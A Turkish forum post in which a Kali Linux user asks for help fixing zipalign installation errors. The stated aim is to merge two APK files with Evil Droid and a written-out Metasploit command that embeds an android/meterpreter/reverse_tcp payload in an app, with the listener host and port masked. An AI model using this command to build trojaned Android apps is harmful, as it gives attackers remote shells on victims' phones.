Kali linux(2018.3) 64bit zipalign yükleme sorunu

mustafa.old

Hectopat
Merhaba konu başlığında da belirttiğim gibi zipalign paketini bir türlü yükleyemiyorum. Zipalign'i ne için kullanacığımdan kısaca bahsediyim. Konu daha anlaşılır olsun. Zipalign'i aslında iki apk dosyasını birleştirmek için kullamak istiyorum. Bunun için zipalign paketi gerekli. Evil Droid adlı bir uygulama var. Onun içinde zipalign paketini otomatik olarak kuruyor. Fakat "msfconsole -x apk.apk -p android/meterpreter/reverse_tcp LHOST=***** LPORT=**** R> new.apk" şeklinde terminalden apk birleştirme işlemi yaptığımda apktools hatası veriyor.

Hata resmi:

j0aoZo.png

Resimde de gördüğünüz gibi. AptTool hatası alıyorum. Fakat AptTool'da hata olmadığını şu resimden gösterebilirim.

0MQGYE.png

Fakat Terminale zipalign paketini çalıştırmak istediğimde şöyle bir hata alıyorum.

RjSLXA.png

Zipalign'i çalıştırmak istediğim'de oluşan hata'daki paketi yüklemek istediğimde şöyle bir hata alıyorum. [apt-get install libc++]

OR3CpK.jpg

Hatadaki Paketi de yüklemek istediğimde bu sefer başka hata alıyorum.

oDjetL.png

Yani Zipalign'de bir hata olduğu gayet açık. Zipalign'i belki baştan yüklesem sorun düzelir diye umuyorum. Başka forumlarda araştırma yaptığımda zipalignin dosyalarını lib64 klasörüne taşıyorlar. Bu Seferde ben zipalignin dosyalarının bulunduğu klasörün nerede olduğunu bilmiyorum. Anlayacağınız işin içinden çıkamaz hale gelmiş bulunmaktayım. Lütfen yardım edin....

Son düzenleyen: Moderatör:
Uyarı! Bu konu 7 yıl önce açıldı.
Muhtemelen daha fazla tartışma gerekli değildir ki bu durumda yeni bir konu başlatmayı öneririz. Eğer yine de cevabınızın gerekli olduğunu düşünüyorsanız buna rağmen cevap verebilirsiniz.

Technopat Haberler

Geri
Yukarı